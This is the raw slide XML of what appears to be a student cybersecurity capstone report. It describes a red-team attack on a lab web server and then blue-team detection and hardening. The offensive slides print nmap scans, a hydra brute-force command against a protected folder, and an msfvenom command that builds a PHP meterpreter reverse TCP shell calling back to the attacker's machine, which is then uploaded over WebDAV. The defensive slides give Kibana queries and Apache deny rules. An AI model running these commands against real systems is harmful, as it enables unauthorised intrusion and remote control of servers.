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9" roundtripDataSignature="AMtx7mig8ihjeNggpmn0CCOnyznXlYOp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D68FB2-C00A-4385-B00F-EF89B29E7E25}">
  <a:tblStyle styleId="{25D68FB2-C00A-4385-B00F-EF89B29E7E2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6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6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3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8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9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" name="Google Shape;12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9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4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4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1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41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41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2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2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4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" name="Google Shape;16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3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3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7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5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5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6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6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7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7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0" name="Google Shape;310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9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9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9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9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5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5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5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50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5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5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50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5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5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50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5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50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5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51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51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1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5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7" name="Google Shape;467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5" name="Google Shape;495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4" name="Google Shape;514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3" name="Google Shape;533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2" name="Google Shape;552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1" name="Google Shape;571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3" name="Google Shape;59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5" name="Google Shape;615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6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6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6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6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0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9" name="Google Shape;65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1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4" name="Google Shape;68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9" name="Google Shape;70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4" name="Google Shape;734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9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9" name="Google Shape;75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5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7" name="Google Shape;787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5" name="Google Shape;815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7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7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3" name="Google Shape;843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8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0" name="Google Shape;87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9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1" name="Google Shape;901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2" name="Google Shape;932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3" name="Google Shape;96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2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" name="Google Shape;99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0" name="Google Shape;100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0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3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0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30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5" name="Google Shape;100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8" name="Google Shape;100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3" name="Google Shape;10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1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33.jpg"/><Relationship Id="rId5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92.168.1.105/company_folders/secret_folder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36.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.jpg"/><Relationship Id="rId7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31.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.jpg"/><Relationship Id="rId6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9.jpg"/><Relationship Id="rId5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3.jpg"/><Relationship Id="rId5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40.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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unix.stackexchange.com/questions/345114/how-to-protect-against-port-scanners" TargetMode="External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ve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-68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-US" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:b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Exploitation: WEB SERVER DIRECTORY ACCESS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="Google Shape;1107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108" name="Google Shape;1108;p1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Kali Machine,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cmd: ifconfig &lt;my ip&gt;=192.168.1.90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cmd: nmap –sV 192.168.1.0/24 &gt; nmap_result.txt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 to 192.168.1.105 with web browser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Recon Info about company</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110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1" name="Google Shape;1111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4" name="Google Shape;1114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6" name="Google Shape;1116;p1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8" name="Google Shape;1118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9" name="Google Shape;111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1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3" name="Google Shape;1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147" y="1869109"/>
            <a:ext cx="2185698" cy="248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8175" y="1491154"/>
            <a:ext cx="2314500" cy="18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8175" y="3340451"/>
            <a:ext cx="2151013" cy="153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PASSWORD &amp; HASH CRACK</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1131" name="Google Shape;1131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132" name="Google Shape;1132;p1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Brute force attack using word list.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cmd: hydra –l ashton –P rockyou.txt  -s 80 –f –vV 192.168.1.105 http-get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="9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http://192.168.1.105/company_folders/secret_folder</a:t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process revealed username &amp; hash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(PW ) then used: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online site to crack md5 hash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performed second nmap against website IP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cmd: nmap –script http-enum –p80 192.168.1.105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1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5" name="Google Shape;1135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1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8" name="Google Shape;1138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0" name="Google Shape;1140;p11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="1707478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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="1707478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 to secret_folder using ashton credentials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Locate 2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" baseline="3000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</a:t>
            </a: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username (ryan) and hash (linux4u)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Logged into webdav to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up next exploit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1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3" name="Google Shape;1143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1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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5603803" y="1481374"/>
            <a:ext cx="3168872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7" name="Google Shape;114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079" y="1442547"/>
            <a:ext cx="3691356" cy="52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4079" y="2008104"/>
            <a:ext cx="3038493" cy="97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4079" y="3046420"/>
            <a:ext cx="3020519" cy="85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9260" y="3899506"/>
            <a:ext cx="2300891" cy="156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Exploitation: REVERSE TCP SHELL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1156" name="Google Shape;1156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157" name="Google Shape;1157;p1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Metasploit to search for a reverse tcp shell to gain access to webserver DB.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msfvenom –p php/meterpreter_reverese_tcp LHOST=192.168.1.90 LPORT=21 –f raw &gt; shell.php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Copy this into webdav-filemanager access through browser to set up reverse shell.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give me access to DB and access to the goal &lt;FLAG&gt;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1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0" name="Google Shape;1160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2" name="Google Shape;1162;p1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3" name="Google Shape;1163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5" name="Google Shape;1165;p1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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3534225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Granted me user shell to acess DB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7" name="Google Shape;1167;p1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8" name="Google Shape;1168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1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2" name="Google Shape;1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897" y="616050"/>
            <a:ext cx="1729723" cy="167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0691" y="2416768"/>
            <a:ext cx="2740246" cy="4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825" y="1703958"/>
            <a:ext cx="2558286" cy="57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5004" y="2895621"/>
            <a:ext cx="2272616" cy="240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3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2" name="Google Shape;118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8" name="Google Shape;1188;p14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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US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190" name="Google Shape;1190;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1512256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14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With Initial namp  @ 00:49 PST</a:t>
            </a:r>
            <a:endParaRPr sz="12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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1192" name="Google Shape;1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1146" y="1686717"/>
            <a:ext cx="2371844" cy="217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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US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00" name="Google Shape;1200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5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900"/>
              <a:t>What time did the request occur? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900"/>
              <a:t>00:49 Nov 3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900"/>
              <a:t> How many requests were made? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900"/>
              <a:t>10145 – multiple attempts during brute force but using wrong login </a:t>
            </a:r>
            <a:endParaRPr sz="9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900"/>
              <a:t>Which files were requested?  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900"/>
              <a:t>“Connect To Corp _Server “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900"/>
              <a:t>What did they contain? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900"/>
              <a:t>Instructions to connect to WEBDAV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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1203" name="Google Shape;12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323" y="1579075"/>
            <a:ext cx="4067665" cy="139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7988" y="1908706"/>
            <a:ext cx="3888557" cy="125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1" name="Google Shape;1211;p1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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US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12" name="Google Shape;1212;p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1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How many requests were made in the attack? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200"/>
              <a:t>Over 2 mil, total but again login was initially wrong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How many requests had been made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>discovered the password? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200"/>
              <a:t>10145</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1215" name="Google Shape;12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01" y="1561739"/>
            <a:ext cx="3000749" cy="194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3050" y="1958187"/>
            <a:ext cx="3970876" cy="136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3" name="Google Shape;1223;p1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/>
              <a:t>Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US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24" name="Google Shape;1224;p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225" name="Google Shape;1225;p1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1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How many requests were made to this directory?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200"/>
              <a:t>36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Reverse shell was uploaded </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1227" name="Google Shape;12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551" y="1675771"/>
            <a:ext cx="2552602" cy="104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3782" y="1501218"/>
            <a:ext cx="2215830" cy="214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6039" y="1708169"/>
            <a:ext cx="1756971" cy="186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8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-US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7" name="Google Shape;1237;p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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243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244" name="Google Shape;1244;p19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What kind of alarm can be set to detect future port scans?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Report Criteria: set # of ports access from a single IP  over time.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What threshold would you set to activate this alarm? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400"/>
              <a:t>Alert &amp; Send Email &gt; 15  per PORT 80 with same IP</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1245" name="Google Shape;1245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/>
              <a:t>What configurations can be set on the host to mitigate port scans?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https://unix.stackexchange.com/questions/345114/how-to-protect-against-port-scanners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246" name="Google Shape;12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187" y="2272121"/>
            <a:ext cx="3299431" cy="120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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532419" y="670302"/>
            <a:ext cx="763768" cy="587653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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1399684" y="662022"/>
            <a:ext cx="7469966" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D6D6D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 txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12450" y="73799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ES          </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Executive Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Google Shape;1028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029" name="Google Shape;1029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1" name="Google Shape;1031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2" name="Google Shape;1032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4" name="Google Shape;1034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5" name="Google Shape;1035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7" name="Google Shape;1037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8" name="Google Shape;1038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40" name="Google Shape;1040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1" name="Google Shape;1041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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36796" y="391578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Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1252" name="Google Shape;125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3" name="Google Shape;1253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What kind of alarm can be set to detect future unauthorized access?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Log access to “Secret_Folder”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Also have a Max # of login time before lockout.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Alert &amp; Email when access is detected from IP other than 192.168.1.105/192.168.1.1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4" name="Google Shape;1254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b="1" lang="en-US" sz="1050"/>
              <a:t>Set your configuration file to block unauthorized access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b="1" lang="en-US" sz="1050"/>
              <a:t>to the “secret_folder” from any IP other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b="1" lang="en-US" sz="1050"/>
              <a:t>than those listed and disable dir listings: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b="1" lang="en-US" sz="1050"/>
              <a:t>Open your httpd.conf file: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&gt; nano /etc/httpd/conf/httpd.conf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* Locate directory section (/var/www/) and set it as follows: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&lt;Directory /var/www/company_folders/secret_folder/&gt;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Order allow,deny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Allow from 192.168.1.1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Allow from 192.168.1.105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Deny from 192.168.1.90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 sz="1050"/>
              <a:t>&lt;/Directory&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="10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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Google Shape;1260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1" name="Google Shape;1261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/>
              <a:t>What kind of alarm can be set to detect future brute force attacks?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Search criteria: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/>
              <a:t>http.request.method : "get" and user_agent.original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/>
              <a:t>:"Mozilla/4.0 (Hydra)" and url.path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/>
              <a:t>:"/company_folders/secret_folder/" and status :(Error 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000"/>
              <a:t>OK)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What threshold would you set to activate this alarm?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Alert email and log when, on protected files and folders, &gt;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Error (401) responses occur at any time OR any OK (200)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responses occur from non-trusted IPs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62" name="Google Shape;1262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Develop a strong PW policy , and LOCKOUT after failed attempts.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2 Factor Authentication and IP tracked LOGIN.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Limit failed login attempts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Don’t use a default port, edit the port line in your </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="900"/>
              <a:t>sshd_config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900"/>
              <a:t>file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Use Captcha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Limit logins to a specified IP address or range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Two factor authentication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Unique login URLs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https://phoenixnap.com/kb/prevent-brute-force-attacks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Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1268" name="Google Shape;1268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9" name="Google Shape;1269;p2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Search criteria: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http.request.method : * and url.path: *webdav*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source.ip: (not 192.168.1.150 or 192.168.1.1)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Alert email and log when requests are made, on protected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files and folders, from non-trusted IPs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0" name="Google Shape;1270;p2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Set your configuration file to block unauthorized access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to the “WEBDAV” from any IP other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than those listed and disable dir listings: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Open your httpd.conf file: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&gt; nano /etc/httpd/conf/httpd.conf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* Locate directory section (/var/www/) and set it as follows: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&lt;Directory /var/www/webdav/&gt;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Order allow,deny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Allow from 192.168.1.1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Allow from 192.168.1.105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Deny from 192.168.1.90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Allow from 127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Deny all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&lt;/Directory&gt;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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;127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7" name="Google Shape;1277;p2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What kind of alarm can be set to detect future file uploads?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http.request.method : * and url.path: *webdav*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-US" sz="1000"/>
              <a:t>source.ip: (not 192.168.1.150 or 192.168.1.1)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Alert email and log when requests are made, on protected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files and folders, from non-trusted IPs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8" name="Google Shape;1278;p2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What configuration can be set on the host to block file uploads?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 This exploit was allowed due to lack on hardening covered in previous mitigation review.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Open your httpd.conf file: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&gt; nano /etc/httpd/conf/httpd.conf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* Locate directory section (/var/www/) and set it as follows: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&lt;Directory /var/www/company_folders/secret_folder/&gt;e**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Order allow,deny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Allow from 192.168.1.1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Allow from 192.168.1.105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Allow 127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Deny from 192.168.1.90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/>
              <a:t>&lt;/Directory&gt;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/>
              <a:t>This is a single point of failure because access to the folder leads to access to other sensitive areas.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1054" name="Google Shape;1054;p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Executive Summary </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p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61" name="Google Shape;1061;p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sp>
        <p:nvSpPr>
          <p:cNvPr id="1062" name="Google Shape;1062;p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/>
              <a:t>This report outlines the Assessment, Analysis, and Hardening of your company’s system.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/>
              <a:t>The Capstone Web Server was </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>successfully exploited Nov 3, 2020, This exploitation was due to vulnerabilities which aided in a successful attack.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/>
              <a:t>Mitigation strategies are provided with some examples and suggestions to help harden and prevent future attacks.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Network Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068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4" name="Google Shape;1074;p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Address Range: 192.168.1.1-105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Netmask:255.255.255.0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OS:Linux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OS:Linux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 Capstone(target)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IPv4:192.168.1.1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OS:windows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Hostname:VM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75" name="Google Shape;1075;p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076" name="Google Shape;1076;p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pic>
        <p:nvPicPr>
          <p:cNvPr id="1077" name="Google Shape;10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42" y="1023433"/>
            <a:ext cx="6236465" cy="355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7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5" name="Google Shape;1085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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091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2" name="Google Shape;1092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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1093" name="Google Shape;1093;p8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{25D68FB2-C00A-4385-B00F-EF89B29E7E25}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System(SIEM)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 TESTING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VM(SWITCH)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VM-SWITCH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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099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100" name="Google Shape;1100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/>
              <a:t>Joe Johnson</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1101" name="Google Shape;1101;p9"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="39075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{25D68FB2-C00A-4385-B00F-EF89B29E7E25}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="362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004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–sV provided RECON  to further access browser directories of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng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webserver.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i="1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TO PUBLIC VIEW</a:t>
                      </a:r>
                      <a:endParaRPr i="0" sz="10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DISCOVERY OF 192.168.1.105/COMPANY_FOLDERS</a:t>
                      </a:r>
                      <a:endParaRPr i="0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WITHIN DIRECTORIES LIST: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ASHTON</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr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–WEB ADMINISTRATOR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./COMPANY_FOLDERS/SECRET_FOLDER</a:t>
                      </a:r>
                      <a:endParaRPr i="1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Administrator weak password, also not mitigation present.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 attack using wordlist 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gained to /secret_folder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provided username &amp; hash for webdav</a:t>
                      </a:r>
                      <a:endParaRPr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baseline="30000"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ND</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr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ADMIN(RYAN) MD5 – hash IN PLAIN SIGHT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 MD5 HASH FOR RYAN </a:t>
                      </a:r>
                      <a:endParaRPr i="0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ACCESS TO WEBDAV</a:t>
                      </a:r>
                      <a:endParaRPr i="1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CVE-2018-6892</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="0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tcp shell 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will result in an attacker controlling the program's execution flow and allowing arbitrary code execution. </a:t>
                      </a:r>
                      <a:endParaRPr i="1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will result in an attacker controlling the program's execution flow and allowing arbitrary code execution. –In instance gained access to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng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r>
                        <a:rPr lang="en-US" sz="10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 through remote backdoor shell.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="10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Mr. Johnson</dc:creator>
</cp:coreProperties>
</file>